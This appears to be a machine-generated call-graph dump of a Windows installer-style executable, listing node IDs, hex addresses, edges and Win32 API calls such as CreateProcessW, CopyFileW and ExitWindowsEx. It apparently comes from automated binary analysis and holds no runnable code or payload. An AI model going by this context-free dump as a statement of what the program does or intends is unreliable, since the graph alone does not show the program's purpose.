4062bf lstrcatW 4770->4773 4771->4770 4771->4771 4772->4767 4773->4772 4774 403d02 4775 403d0d 4774->4775 4776 403d11 4775->4776 4777 403d14 GlobalAlloc 4775->4777 4777->4776 4778 402082 4779 401446 18 API calls 4778->4779 4780 402093 SetWindowLongW 4779->4780 4781 4030e3 4780->4781 4782 402a84 4783 401553 19 API calls 4782->4783 4784 402a8e 4783->4784 4785 401446 18 API calls 4784->4785 4786 402a98 4785->4786 4787 401a13 4786->4787 4788 402ab2 RegEnumKeyW 4786->4788 4789 402abe RegEnumValueW 4786->4789 4790 402a7e 4788->4790 4789->4787 4789->4790 4790->4787 4791 4029e4 RegCloseKey 4790->4791 4791->4787 4792 402c8a 4793 402ca2 4792->4793 4794 402c8f 4792->4794 4796 40145c 18 API calls 4793->4796 4795 401446 18 API calls 4794->4795 4798 402c97 4795->4798 4797 402ca9 lstrlenW 4796->4797 4797->4798 4799 401a13 4798->4799 4800 402ccb WriteFile 4798->4800 4800->4799 4801 401d8e 4802 40145c 18 API calls 4801->4802 4803 401d95 ExpandEnvironmentStringsW 4802->4803 4804 401da8 4803->4804 4805 401db9 4803->4805 4804->4805 4806 401dad lstrcmpW 4804->4806 4806->4805 4807 401e0f 4808 401446 18 API calls 4807->4808 4809 401e17 4808->4809 4810 401446 18 API calls 4809->4810 4811 401e21 4810->4811 4812 4030e3 4811->4812 4814 405f7d wsprintfW 4811->4814 4814->4812 4815 40438f 4816 4043c8 4815->4816 4817 40439f 4815->4817 4818 403df6 8 API calls 4816->4818 4819 403d6b 19 API calls 4817->4819 4821 4043d4 4818->4821 4820 4043ac SetDlgItemTextW 4819->4820 4820->4816 4822 403f90 4823 403fa0 4822->4823 4824 403fbc 4822->4824 4833 405cb0 GetDlgItemTextW 4823->4833 4826 403fc2 SHGetPathFromIDListW 4824->4826 4827 403fef 4824->4827 4829 403fd2 4826->4829 4832 403fd9 SendMessageW 4826->4832 4828 403fad SendMessageW 4828->4824 4830 40141d 80 API calls 4829->4830 4830->4832 4832->4827 4833->4828 4834 402392 4835 40145c 18 API calls 4834->4835 4836 402399 4835->4836 4839 407224 4836->4839 4840 406efe 25 API calls 4839->4840 4841 407244 4840->4841 4842 4023a7 4841->4842 4843 40724e lstrcpynW lstrcmpW 4841->4843 4844 407280 4843->4844 4845 407286 lstrcpynW 4843->4845 4844->4845 4845->4842 3338 402713 3353 406035 lstrcpynW 3338->3353 3340 40272c 3354 406035 lstrcpynW 3340->3354 3342 402738 3343 402743 3342->3343 3344 40145c 18 API calls 3342->3344 3345 40145c 18 API calls 3343->3345 3347 402752 3343->3347 3344->3343 3345->3347 3348 40145c 18 API calls 3347->3348 3350 402761 3347->3350 3348->3350 3355 40145c 3350->3355 3353->3340 3354->3342 3363 406831 3355->3363 3358 401497 3360 4062cf lstrlenW wvsprintfW 3358->3360 3403 406113 3360->3403 3372 40683e 3363->3372 3364 406aab 3365 401488 3364->3365 3398 406035 lstrcpynW 3364->3398 3365->3358 3382 406064 3365->3382 3367 4068ff GetVersion 3377 40690c 3367->3377 3368 406a72 lstrlenW 3368->3372 3370 406831 10 API calls 3370->3368 3372->3364 3372->3367 3372->3368 3372->3370 3375 406064 5 API calls 3372->3375 3396 405f7d wsprintfW 3372->3396 3397 406035 lstrcpynW 3372->3397 3374 40697e GetSystemDirectoryW 3374->3377 3375->3372 3376 406991 GetWindowsDirectoryW 3376->3377 3377->3372 3377->3374 3377->3376 3378 406831 10 API calls 3377->3378 3379 406a0b lstrcatW 3377->3379 3380 4069c5 SHGetSpecialFolderLocation 3377->3380 3391 405eff RegOpenKeyExW 3377->3391 3378->3377 3379->3372 3380->3377 3381 4069dd SHGetPathFromIDListW CoTaskMemFree 3380->3381 3381->3377 3389 406071 3382->3389 3383 4060e7 3384 4060ed CharPrevW 3383->3384 3386 40610d 3383->3386 3384->3383 3385 4060da CharNextW 3385->3383 3385->3389 3386->3358 3388 4060c6 CharNextW 3388->3389 3389->3383 3389->3385 3389->3388 3390 4060d5 CharNextW 3389->3390 3399 405d32 3389->3399 3390->3385 3392 405f33 RegQueryValueExW 3391->3392 3393 405f78 3391->3393 3394 405f55 RegCloseKey 3392->3394 3393->3377 3394->3393 3396->3372 3397->3372 3398->3365 3400 405d38 3399->3400 3401 405d4e 3400->3401 3402 405d3f CharNextW 3400->3402 3401->3389 3402->3400 3404 40613c 3403->3404 3405 40611f 3403->3405 3407 4061b3 3404->3407 3408 406159 3404->3408 3409 40277f WritePrivateProfileStringW 3404->3409 3406 406129 CloseHandle 3405->3406 3405->3409 3406->3409 3407->3409 3410 4061bc lstrcatW lstrlenW WriteFile 3407->3410 3408->3410 3411 406162 GetFileAttributesW 3408->3411 3410->3409 3416 405e7c GetFileAttributesW CreateFileW 3411->3416 3413 40617e 3413->3409 3414 4061a8 SetFilePointer 3413->3414 3415 40618e WriteFile 3413->3415 3414->3407 3415->3414 3416->3413 4846 402797 4847 40145c 18 API calls 4846->4847 4848 4027ae 4847->4848 4849 40145c 18 API calls 4848->4849 4850 4027b7 4849->4850 4851 40145c 18 API calls 4850->4851 4852 4027c0 GetPrivateProfileStringW lstrcmpW 4851->4852 4853 401e9a 4854 40145c 18 API calls 4853->4854 4855 401ea1 4854->4855 4856 401446 18 API calls 4855->4856 4857 401eab wsprintfW 4856->4857 3808 401a1f 3809 40145c 18 API calls 3808->3809 3810 401a26 3809->3810 3811 4062cf 11 API calls 3810->3811 3812 401a49 3811->3812 3813 401a64 3812->3813 3814 401a5c 3812->3814 3883 406035 lstrcpynW 3813->3883 3882 406035 lstrcpynW 3814->3882 3817 401a6f 3884 40674e lstrlenW CharPrevW 3817->3884 3818 401a62 3821 406064 5 API calls 3818->3821 3852 401a81 3821->3852 3822 406301 2 API calls 3822->3852 3825 401a98 CompareFileTime 3825->3852 3826 401ba9 3827 404f9e 25 API calls 3826->3827 3829 401bb3 3827->3829 3828 401b5d 3830 404f9e 25 API calls 3828->3830 3861 40337f 3829->3861 3832 401b70 3830->3832 3836 4062cf 11 API calls 3832->3836 3834 406035 lstrcpynW 3834->3852 3835 4062cf 11 API calls 3837 401bda 3835->3837 3841 401b8b 3836->3841 3838 401be9 SetFileTime 3837->3838 3839 401bf8 CloseHandle 3837->3839 3838->3839 3839->3841 3842 401c09 3839->3842 3840 406831 18 API calls 3840->3852 3843 401c21 3842->3843 3844 401c0e 3842->3844 3845 406831 18 API calls 3843->3845 3846 406831 18 API calls 3844->3846 3847 401c29 3845->3847 3849 401c16 lstrcatW 3846->3849 3850 4062cf 11 API calls 3847->3850 3849->3847 3853 401c34 3850->3853 3851 401b50 3855 401b93 3851->3855 3856 401b53 3851->3856 3852->3822 3852->3825 3852->3826 3852->3828 3852->3834 3852->3840 3852->3851 3854 4062cf 11 API calls 3852->3854 3860 405e7c GetFileAttributesW CreateFileW 3852->3860 3887 405e5c GetFileAttributesW 3852->3887 3890 405ccc 3852->3890 3857 405ccc MessageBoxIndirectW 3853->3857 3854->3852 3858 4062cf 11 API calls 3855->3858 3859 4062cf 11 API calls 3856->3859 3857->3841 3858->3841 3859->3828 3860->3852 3862 40339a 3861->3862 3863 4033c7 3862->3863 3896 403368 SetFilePointer 3862->3896 3894 403336 ReadFile 3863->3894 3867 401bc6 3867->3835 3868 403546 3870 40354a 3868->3870 3871 40356e 3868->3871 3869 4033eb GetTickCount 3869->3867 3874 403438 3869->3874 3872 403336 ReadFile 3870->3872 3871->3867 3875 403336 ReadFile 3871->3875 3876 40358d WriteFile 3871->3876 3872->3867 3873 403336 ReadFile 3873->3874 3874->3867 3874->3873 3878 40348a GetTickCount 3874->3878 3879 4034af MulDiv wsprintfW 3874->3879 3881 4034f3 WriteFile 3874->3881 3875->3871 3876->3867 3877 4035a1 3876->3877 3877->3867 3877->3871 3878->3874 3880 404f9e 25 API calls 3879->3880 3880->3874 3881->3867 3881->3874 3882->3818 3883->3817 3885 401a75 lstrcatW 3884->3885 3886 40676b lstrcatW 3884->3886 3885->3818 3886->3885 3888 405e79 3887->3888 3889 405e6b SetFileAttributesW 3887->3889 3888->3852 3889->3888 3891 405ce1 3890->3891 3892 405d2f 3891->3892 3893 405cf7 MessageBoxIndirectW 3891->3893 3892->3852 3893->3892 3895 403357 3894->3895 3895->3867 3895->3868 3895->3869 3896->3863 4858 40209f GetDlgItem GetClientRect 4859 40145c 18 API calls 4858->4859 4860 4020cf LoadImageW SendMessageW 4859->4860 4861 4030e3 4860->4861 4862 4020ed DeleteObject 4860->4862 4862->4861 4863 402b9f 4864 401446 18 API calls 4863->4864 4868 402ba7 4864->4868 4865 402c4a 4866 402bdf ReadFile 4866->4868 4875 402c3d 4866->4875 4867 401446 18 API calls 4867->4875 4868->4865 4868->4866 4869 402c06 MultiByteToWideChar 4868->4869 4870 402c3f 4868->4870 4871 402c4f 4868->4871 4868->4875 4869->4868 4869->4871 4876 405f7d wsprintfW 4870->4876 4873 402c6b SetFilePointer 4871->4873 4871->4875 4873->4875 4874 402d17 ReadFile 4874->4875 4875->4865 4875->4867 4875->4874 4876->4865 4877 402b23 GlobalAlloc 4878 402b39 4877->4878 4879 402b4b 4877->4879 4880 401446 18 API calls 4878->4880 4881 40145c 18 API calls 4879->4881 4883 402b41 4880->4883 4882 402b52 WideCharToMultiByte lstrlenA 4881->4882 4882->4883 4884 402b84 WriteFile 4883->4884 4885 402b93 4883->4885 4884->4885 4886 402384 GlobalFree 4884->4886 4886->4885 4888 4040a3 4889 4040b0 lstrcpynW lstrlenW 4888->4889 4890 4040ad 4888->4890 4890->4889 3430 4054a5 3431 4055f9 3430->3431 3432 4054bd 3430->3432 3434 40564a 3431->3434 3435 40560a GetDlgItem GetDlgItem 3431->3435 3432->3431 3433 4054c9 3432->3433 3437 4054d4 SetWindowPos 3433->3437 3438 4054e7 3433->3438 3436 4056a4 3434->3436 3444 40139d 80 API calls 3434->3444 3439 403d6b 19 API calls 3435->3439 3445 4055f4 3436->3445 3500 403ddb 3436->3500 3437->3438 3441 405504 3438->3441 3442 4054ec ShowWindow 3438->3442 3443 405634 SetClassLongW 3439->3443 3446 405526 3441->3446 3447 40550c DestroyWindow 3441->3447 3442->3441 3448 40141d 80 API calls 3443->3448 3451 40567c 3444->3451 3449 40552b SetWindowLongW 3446->3449 3450 40553c 3446->3450 3452 405908 3447->3452 3448->3434 3449->3445 3453 4055e5 3450->3453 3454 405548 GetDlgItem 3450->3454 3451->3436 3455 405680 SendMessageW 3451->3455 3452->3445 3461 405939 ShowWindow 3452->3461 3520 403df6 3453->3520 3458 405578 3454->3458 3459 40555b SendMessageW IsWindowEnabled 3454->3459 3455->3445 3456 40141d 80 API calls 3469 4056b6 3456->3469 3457 40590a DestroyWindow KiUserCallbackDispatcher 3457->3452 3463 405585 3458->3463 3466 4055cc SendMessageW 3458->3466 3467 405598 3458->3467 3475 40557d 3458->3475 3459->3445 3459->3458 3461->3445 3462 406831 18 API calls 3462->3469 3463->3466 3463->3475 3465 403d6b 19 API calls 3465->3469 3466->3453 3470 4055a0 3467->3470 3471 4055b5 3467->3471 3468 4055b3 3468->3453 3469->3445 3469->3456 3469->3457 3469->3462 3469->3465 3491 40584a DestroyWindow 3469->3491 3503 403d6b 3469->3503 3514 40141d 3470->3514 3472 40141d 80 API calls 3471->3472 3474 4055bc 3472->3474 3474->3453 3474->3475 3517 403d44 3475->3517 3477 405731 GetDlgItem 3478 405746 3477->3478 3479 40574f ShowWindow KiUserCallbackDispatcher 3477->3479 3478->3479 3506 403db1 KiUserCallbackDispatcher 3479->3506 3481 405779 EnableWindow 3484 40578d 3481->3484 3482 405792 GetSystemMenu EnableMenuItem SendMessageW 3483 4057c2 SendMessageW 3482->3483 3482->3484 3483->3484 3484->3482 3507 403dc4 SendMessageW 3484->3507 3508 406035 lstrcpynW 3484->3508 3487 4057f0 lstrlenW 3488 406831 18 API calls 3487->3488 3489 405806 SetWindowTextW 3488->3489 3509 40139d 3489->3509 3491->3452 3492 405864 CreateDialogParamW 3491->3492 3492->3452 3493 405897 3492->3493 3494 403d6b 19 API calls 3493->3494 3495 4058a2 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3494->3495 3496 40139d 80 API calls 3495->3496 3497 4058e8 3496->3497 3497->3445 3498 4058f0 ShowWindow 3497->3498 3499 403ddb SendMessageW 3498->3499 3499->3452 3501 403df3 3500->3501 3502 403de4 SendMessageW 3500->3502 3501->3469 3502->3501 3504 406831 18 API calls 3503->3504 3505 403d76 SetDlgItemTextW 3504->3505 3505->3477 3506->3481 3507->3484 3508->3487 3512 4013a4 3509->3512 3510 401410 3510->3469 3512->3510 3513 4013dd MulDiv SendMessageW 3512->3513 3534 4015a0 3512->3534 3513->3512 3515 40139d 80 API calls 3514->3515 3516 401432 3515->3516 3516->3475 3518 403d51 SendMessageW 3517->3518 3519 403d4b 3517->3519 3518->3468 3519->3518 3521 403e0b GetWindowLongW 3520->3521 3531 403e94 3520->3531 3522 403e1c 3521->3522 3521->3531 3523 403e2b GetSysColor 3522->3523 3524 403e2e 3522->3524 3523->3524 3525 403e34 SetTextColor 3524->3525 3526 403e3e SetBkMode 3524->3526 3525->3526 3527 403e56 GetSysColor 3526->3527 3528 403e5c 3526->3528 3527->3528 3529 403e63 SetBkColor 3528->3529 3530 403e6d 3528->3530 3529->3530 3530->3531 3532 403e80 DeleteObject 3530->3532 3533 403e87 CreateBrushIndirect 3530->3533 3531->3445 3532->3533 3533->3531 3535 4015fa 3534->3535 3614 40160c 3534->3614 3536 401601 3535->3536 3537 401742 3535->3537 3538 401962 3535->3538 3539 4019ca 3535->3539 3540 40176e 3535->3540 3541 401650 3535->3541 3542 4017b1 3535->3542 3543 401672 3535->3543 3544 401693 3535->3544 3545 401616 3535->3545 3546 4016d6 3535->3546 3547 401736 3535->3547 3548 401897 3535->3548 3549 4018db 3535->3549 3550 40163c 3535->3550 3551 4016bd 3535->3551 3535->3614 3560 4062cf 11 API calls 3536->3560 3552 401751 ShowWindow 3537->3552 3553 401758 3537->3553 3557 40145c 18 API calls 3538->3557 3564 40145c 18 API calls 3539->3564 3554 40145c 18 API calls 3540->3554 3578 4062cf 11 API calls 3541->3578 3558 40145c 18 API calls 3542->3558 3555 40145c 18 API calls 3543->3555 3559 401446 18 API calls 3544->3559 3563 40145c 18 API calls 3545->3563 3577 401446 18 API calls 3546->3577 3546->3614 3547->3614 3668 405f7d wsprintfW 3547->3668 3556 40145c 18 API calls 3548->3556 3561 40145c 18 API calls 3549->3561 3565 401647 PostQuitMessage 3550->3565 3550->3614 3562 4062cf 11 API calls 3551->3562 3552->3553 3566 401765 ShowWindow 3553->3566 3553->3614 3567 401775 3554->3567 3568 401678 3555->3568 3569 40189d 3556->3569 3570 401968 GetFullPathNameW 3557->3570 3571 4017b8 3558->3571 3572 40169a 3559->3572 3560->3614 3573 4018e2 3561->3573 3574 4016c7 SetForegroundWindow 3562->3574 3575 40161c 3563->3575 3576 4019d1 SearchPathW 3564->3576 3565->3614 3566->3614 3580 4062cf 11 API calls 3567->3580 3581 4062cf 11 API calls 3568->3581 3659 406301 FindFirstFileW 3569->3659 3583 4019a1 3570->3583 3584 40197f 3570->3584 3585 4062cf 11 API calls 3571->3585 3586 4062cf 11 API calls 3572->3586 3587 40145c 18 API calls 3573->3587 3574->3614 3588 4062cf 11 API calls 3575->3588 3576->3547 3576->3614 3577->3614 3589 401664 3578->3589 3590 401785 SetFileAttributesW 3580->3590 3591 401683 3581->3591 3603 4019b8 GetShortPathNameW 3583->3603 3583->3614 3584->3583 3609 406301 2 API calls 3584->3609 3593 4017c9 3585->3593 3594 4016a7 Sleep 3586->3594 3595 4018eb 3587->3595 3596 401627 3588->3596 3597 40139d 65 API calls 3589->3597 3598 40179a 3590->3598 3590->3614 3607 404f9e 25 API calls 3591->3607 3641 405d85 CharNextW CharNextW 3593->3641 3594->3614 3604 40145c 18 API calls 3595->3604 3605 404f9e 25 API calls 3596->3605 3597->3614 3606 4062cf 11 API calls 3598->3606 3599 4018c2 3610 4062cf 11 API calls 3599->3610 3600 4018a9 3608 4062cf 11 API calls 3600->3608 3603->3614 3612 4018f5 3604->3612 3605->3614 3606->3614 3607->3614 3608->3614 3613 401991 3609->3613 3610->3614 3611 4017d4 3615 401864 3611->3615 3618 405d32 CharNextW 3611->3618 3636 4062cf 11 API calls 3611->3636 3616 4062cf 11 API calls 3612->3616 3613->3583 3667 406035 lstrcpynW 3613->3667 3614->3512 3615->3591 3617 40186e 3615->3617 3619 401902 MoveFileW 3616->3619 3647 404f9e 3617->3647 3622 4017e6 CreateDirectoryW 3618->3622 3623 401912 3619->3623 3624 40191e 3619->3624 3622->3611 3626 4017fe GetLastError 3622->3626 3623->3591 3630 406301 2 API calls 3624->3630 3640 401942 3624->3640 3628 401827 GetFileAttributesW 3626->3628 3629 40180b GetLastError 3626->3629 3628->3611 3633 4062cf 11 API calls 3629->3633 3634 401929 3630->3634 3631 401882 SetCurrentDirectoryW 3631->3614 3632 4062cf 11 API calls 3635 40195c 3632->3635 3633->3611 3634->3640 3662 406c94 3634->3662 3635->3614 3636->3611 3639 404f9e 25 API calls 3639->3640 3640->3632 3642 405da2 3641->3642 3645 405db4 3641->3645 3644 405daf CharNextW 3642->3644 3642->3645 3643 405dd8 3643->3611 3644->3643 3645->3643 3646 405d32 CharNextW 3645->3646 3646->3645 3648 404fb7 3647->3648 3649 401875 3647->3649 3650 404fd5 lstrlenW 3648->3650 3651 406831 18 API calls 3648->3651 3658 406035 lstrcpynW 3649->3658 3652 404fe3 lstrlenW 3650->3652 3653 404ffe 3650->3653 3651->3650 3652->3649 3654 404ff5 lstrcatW 3652->3654 3655 405011 3653->3655 3656 405004 SetWindowTextW 3653->3656 3654->3653 3655->3649 3657 405017 SendMessageW SendMessageW SendMessageW 3655->3657 3656->3655 3657->3649 3658->3631 3660 4018a5 3659->3660 3661 406317 FindClose 3659->3661 3660->3599 3660->3600 3661->3660 3669 406328 GetModuleHandleA 3662->3669 3666 401936 3666->3639 3667->3583 3668->3614 3670 406340 LoadLibraryA 3669->3670 3671 40634b GetProcAddress 3669->3671 3670->3671 3672 406359 3670->3672 3671->3672 3672->3666 3673 406ac5 lstrcpyW 3672->3673 3674 406b13 GetShortPathNameW 3673->3674 3675 406aea 3673->3675 3676 406b2c 3674->3676 3677 406c8e 3674->3677 3699 405e7c GetFileAttributesW CreateFileW 3675->3699 3676->3677 3680 406b34 WideCharToMultiByte 3676->3680 3677->3666 3679 406af3 CloseHandle GetShortPathNameW 3679->3677 3681 406b0b 3679->3681 3680->3677 3682 406b51 WideCharToMultiByte 3680->3682 3681->3674 3681->3677 3682->3677 3683 406b69 wsprintfA 3682->3683 3684 406831 18 API calls 3683->3684 3685 406b95 3684->3685 3700 405e7c GetFileAttributesW CreateFileW 3685->3700 3687 406ba2 3687->3677 3688 406baf GetFileSize GlobalAlloc 3687->3688 3689 406bd0 ReadFile 3688->3689 3690 406c84 CloseHandle 3688->3690 3689->3690 3691 406bea 3689->3691 3690->3677 3691->3690 3701 405de2 lstrlenA 3691->3701 3694 406c03 lstrcpyA 3697 406c25 3694->3697 3695 406c17 3696 405de2 4 API calls 3695->3696 3696->3697 3698 406c5c SetFilePointer WriteFile GlobalFree 3697->3698 3698->3690 3699->3679 3700->3687 3702 405e23 lstrlenA 3701->3702 3703 405e2b 3702->3703 3704 405dfc lstrcmpiA 3702->3704 3703->3694 3703->3695 3704->3703 3705 405e1a CharNextA 3704->3705 3705->3702 4891 402da5 4892 4030e3 4891->4892 4893 402dac 4891->4893 4894 401446 18 API calls 4893->4894 4895 402db8 4894->4895 4896 402dbf SetFilePointer 4895->4896 4896->4892 4897 402dcf 4896->4897 4897->4892 4899 405f7d wsprintfW 4897->4899 4899->4892 4900 4049a8 GetDlgItem GetDlgItem 4901 4049fe 7 API calls 4900->4901 4906 404c16 4900->4906 4902 404aa2 DeleteObject 4901->4902 4903 404a96 SendMessageW 4901->4903 4904 404aad 4902->4904 4903->4902 4907 404ae4 4904->4907 4910 406831 18 API calls 4904->4910 4905 404cfb 4908 404da0 4905->4908 4909 404c09 4905->4909 4914 404d4a SendMessageW 4905->4914 4906->4905 4918 40487a 5 API calls 4906->4918 4931 404c86 4906->4931 4913 403d6b 19 API calls 4907->4913 4911 404db5 4908->4911 4912 404da9 SendMessageW 4908->4912 4915 403df6 8 API calls 4909->4915 4916 404ac6 SendMessageW SendMessageW 4910->4916 4923 404dc7 ImageList_Destroy 4911->4923 4924 404dce 4911->4924 4929 404dde 4911->4929 4912->4911 4919 404af8 4913->4919 4914->4909 4921 404d5f SendMessageW 4914->4921 4922 404f97 4915->4922 4916->4904 4917 404ced SendMessageW 4917->4905 4918->4931 4925 403d6b 19 API calls 4919->4925 4920 404f48 4920->4909 4930 404f5d ShowWindow GetDlgItem ShowWindow 4920->4930 4926 404d72 4921->4926 4923->4924 4927 404dd7 GlobalFree 4924->4927 4924->4929 4933 404b09 4925->4933 4935 404d83 SendMessageW 4926->4935 4927->4929 4928 404bd6 GetWindowLongW SetWindowLongW 4932 404bf0 4928->4932 4929->4920 4934 40141d 80 API calls 4929->4934 4944 404e10 4929->4944 4930->4909 4931->4905 4931->4917 4936 404bf6 ShowWindow 4932->4936 4937 404c0e 4932->4937 4933->4928 4939 404b65 SendMessageW 4933->4939 4940 404bd0 4933->4940 4942 404b93 SendMessageW 4933->4942 4943 404ba7 SendMessageW 4933->4943 4934->4944 4935->4908 4951 403dc4 SendMessageW 4936->4951 4952 403dc4 SendMessageW 4937->4952 4939->4933 4940->4928 4940->4932 4942->4933 4943->4933 4945 404e54 4944->4945 4948 404e3e SendMessageW 4944->4948 4946 404f1f InvalidateRect 4945->4946 4950 404ecd SendMessageW SendMessageW 4945->4950 4946->4920 4947 404f35 4946->4947 4949 4043d9 21 API calls 4947->4949 4948->4945 4949->4920 4950->4945 4951->4909 4952->4906 4953 4030a9 SendMessageW 4954 4030c2 InvalidateRect 4953->4954 4955 4030e3 4953->4955 4954->4955 3897 4038af #17 SetErrorMode OleInitialize 3898 406328 3 API calls 3897->3898 3899 4038f2 SHGetFileInfoW 3898->3899 3971 406035 lstrcpynW 3899->3971 3901 40391d GetCommandLineW 3972 406035 lstrcpynW 3901->3972 3903 40392f GetModuleHandleW 3904 403947 3903->3904 3905 405d32 CharNextW 3904->3905 3906 403956 CharNextW 3905->3906 3917 403968 3906->3917 3907 403a02 3908 403a21 GetTempPathW 3907->3908 3973 4037f8 3908->3973 3910 403a37 3912 403a3b GetWindowsDirectoryW lstrcatW 3910->3912 3913 403a5f DeleteFileW 3910->3913 3911 405d32 CharNextW 3911->3917 3915 4037f8 11 API calls 3912->3915 3981 4035b3 GetTickCount GetModuleFileNameW 3913->3981 3918 403a57 3915->3918 3916 403a73 3919 403af8 3916->3919 3921 405d32 CharNextW 3916->3921 3957 403add 3916->3957 3917->3907 3917->3911 3924 403a04 3917->3924 3918->3913 3918->3919 4066 403885 3919->4066 3925 403a8a 3921->3925 4073 406035 lstrcpynW 3924->4073 3936 403b23 lstrcatW lstrcmpiW 3925->3936 3937 403ab5 3925->3937 3926 403aed 3929 406113 9 API calls 3926->3929 3927 403bfa 3930 403c7d 3927->3930 3932 406328 3 API calls 3927->3932 3928 403b0d 3931 405ccc MessageBoxIndirectW 3928->3931 3929->3919 3933 403b1b ExitProcess 3931->3933 3935 403c09 3932->3935 3939 406328 3 API calls 3935->3939 3936->3919 3938 403b3f CreateDirectoryW SetCurrentDirectoryW 3936->3938 4074 4067aa 3937->4074 3941 403b62 3938->3941 3942 403b57 3938->3942 3943 403c12 3939->3943 4091 406035 lstrcpynW 3941->4091 4090 406035 lstrcpynW 3942->4090 3947 406328 3 API calls 3943->3947 3950 403c1b 3947->3950 3949 403b70 4092 406035 lstrcpynW 3949->4092 3951 403c69 ExitWindowsEx 3950->3951 3956 403c29 GetCurrentProcess 3950->3956 3951->3930 3955 403c76 3951->3955 3952 403ad2 4089 406035 lstrcpynW 3952->4089 3958 40141d 80 API calls 3955->3958 3960 403c39 3956->3960 4009 405958 3957->4009 3958->3930 3959 406831 18 API calls 3961 403b98 DeleteFileW 3959->3961 3960->3951 3962 403ba5 CopyFileW 3961->3962 3968 403b7f 3961->3968 3962->3968 3963 403bee 3964 406c94 42 API calls 3963->3964 3966 403bf5 3964->3966 3965 406c94 42 API calls 3965->3968 3966->3919 3967 406831 18 API calls 3967->3968 3968->3959 3968->3963 3968->3965 3968->3967 3970 403bd9 CloseHandle 3968->3970 4093 405c6b CreateProcessW 3968->4093 3970->3968 3971->3901 3972->3903 3974 406064 5 API calls 3973->3974 3975 403804 3974->3975 3976 40380e 3975->3976 3977 40674e 3 API calls 3975->3977 3976->3910 3978 403816 CreateDirectoryW 3977->3978 4096 405eab 3978->4096 4100 405e7c GetFileAttributesW CreateFileW 3981->4100 3983 4035f3 4003 403603 3983->4003 4101 406035 lstrcpynW 3983->4101 3985 403619 4102 40677d lstrlenW 3985->4102 3989 40362a GetFileSize 3990 403726 3989->3990 4004 403641 3989->4004 4107 4032d2 3990->4107 3992 40372f 3994 40376b GlobalAlloc 3992->3994 3992->4003 4119 403368 SetFilePointer 3992->4119 3993 403336 ReadFile 3993->4004 4118 403368 SetFilePointer 3994->4118 3997 4037e9 4000 4032d2 6 API calls 3997->4000 3998 403786 4001 40337f 33 API calls 3998->4001 3999 40374c 4002 403336 ReadFile 3999->4002 4000->4003 4007 403792 4001->4007 4006 403757 4002->4006 4003->3916 4004->3990 4004->3993 4004->3997 4004->4003 4005 4032d2 6 API calls 4004->4005 4005->4004 4006->3994 4006->4003 4007->4003 4007->4007 4008 4037c0 SetFilePointer 4007->4008 4008->4003 4010 406328 3 API calls 4009->4010 4011 40596c 4010->4011 4012 405972 4011->4012 4013 405984 4011->4013 4133 405f7d wsprintfW 4012->4133 4014 405eff 3 API calls 4013->4014 4015 4059b5 4014->4015 4017 4059d4 lstrcatW 4015->4017 4019 405eff 3 API calls 4015->4019 4018 405982 4017->4018 4124 403ec1 4018->4124 4019->4017 4022 4067aa 18 API calls 4023 405a06 4022->4023 4024 405a9c 4023->4024 4026 405eff 3 API calls 4023->4026 4025 4067aa 18 API calls 4024->4025 4027 405aa2 4025->4027 4028 405a38 4026->4028 4029 405ab2 4027->4029 4030 406831 18 API calls 4027->4030 4028->4024 4032 405a5b lstrlenW 4028->4032 4035 405d32 CharNextW 4028->4035 4031 405ad2 LoadImageW 4029->4031 4135 403ea0 4029->4135 4030->4029 4033 405b92 4031->4033 4034 405afd RegisterClassW 4031->4034 4036 405a69 lstrcmpiW 4032->4036 4037 405a8f 4032->4037 4041 40141d 80 API calls 4033->4041 4039 405b9c 4034->4039 4040 405b45 SystemParametersInfoW CreateWindowExW 4034->4040 4042 405a56 4035->4042 4036->4037 4043 405a79 GetFileAttributesW 4036->4043 4045 40674e 3 API calls 4037->4045 4039->3926 4040->4033 4046 405b98 4041->4046 4042->4032 4047 405a85 4043->4047 4044 405ac8 4044->4031 4048 405a95 4045->4048 4046->4039 4049 403ec1 19 API calls 4046->4049 4047->4037 4050 40677d 2 API calls 4047->4050 4134 406035 lstrcpynW 4048->4134 4052 405ba9 4049->4052 4050->4037 4053 405bb5 ShowWindow LoadLibraryW 4052->4053 4054 405c38 4052->4054 4055 405bd4 LoadLibraryW 4053->4055 4056 405bdb GetClassInfoW 4053->4056 4057 405073 83 API calls 4054->4057 4055->4056 4058 405c05 DialogBoxParamW 4056->4058 4059 405bef GetClassInfoW RegisterClassW 4056->4059 4060 405c3e 4057->4060 4063 40141d 80 API calls 4058->4063 4059->4058 4061 405c42 4060->4061 4062 405c5a 4060->4062 4061->4039 4065 40141d 80 API calls 4061->4065 4064 40141d 80 API calls 4062->4064 4063->4039 4064->4039 4065->4039 4067 40389d 4066->4067 4068 40388f CloseHandle 4066->4068 4142 403caf 4067->4142 4068->4067 4073->3908 4195 406035 lstrcpynW 4074->4195 4076 4067bb 4077 405d85 4 API calls 4076->4077 4078 4067c1 4077->4078 4079 406064 5 API calls 4078->4079 4086 403ac3 4078->4086 4082 4067d1 4079->4082 4080 406809 lstrlenW 4081 406810 4080->4081 4080->4082 4084 40674e 3 API calls 4081->4084 4082->4080 4083 406301 2 API calls 4082->4083 4082->4086 4087 40677d 2 API calls 4082->4087 4083->4082 4085 406816 GetFileAttributesW 4084->4085 4085->4086 4086->3919 4088 406035 lstrcpynW 4086->4088 4087->4080 4088->3952 4089->3957 4090->3941 4091->3949 4092->3968 4094 405ca6 4093->4094 4095 405c9a CloseHandle 4093->4095 4094->3968 4095->4094 4097 405eb8 GetTickCount GetTempFileNameW 4096->4097 4098 40382a 4097->4098 4099 405eee 4097->4099 4098->3910 4099->4097 4099->4098 4100->3983 4101->3985 4103 40678c 4102->4103 4104 406792 CharPrevW 4103->4104 4105 40361f 4103->4105 4104->4103 4104->4105 4106 406035 lstrcpynW 4105->4106 4106->3989 4108 4032f3 4107->4108 4109 4032db 4107->4109 4112 403303 GetTickCount 4108->4112 4113 4032fb 4108->4113 4110 4032e4 DestroyWindow 4109->4110 4111 4032eb 4109->4111 4110->4111 4111->3992 4115 403311 CreateDialogParamW ShowWindow 4112->4115 4116 403334 4112->4116 4120 40635e 4113->4120 4115->4116 4116->3992 4118->3998 4119->3999 4121 40637b PeekMessageW 4120->4121 4122 406371 DispatchMessageW 4121->4122 4123 403301 4121->4123 4122->4121 4123->3992 4125 403ed5 4124->4125 4140 405f7d wsprintfW 4125->4140 4127 403f49 4128 406831 18 API calls 4127->4128 4129 403f55 SetWindowTextW 4128->4129 4130 403f70 4129->4130 4131 403f8b 4130->4131 4132 406831 18 API calls 4130->4132 4131->4022 4132->4130 4133->4018 4134->4024 4141 406035 lstrcpynW 4135->4141 4137 403eb4 4138 40674e 3 API calls 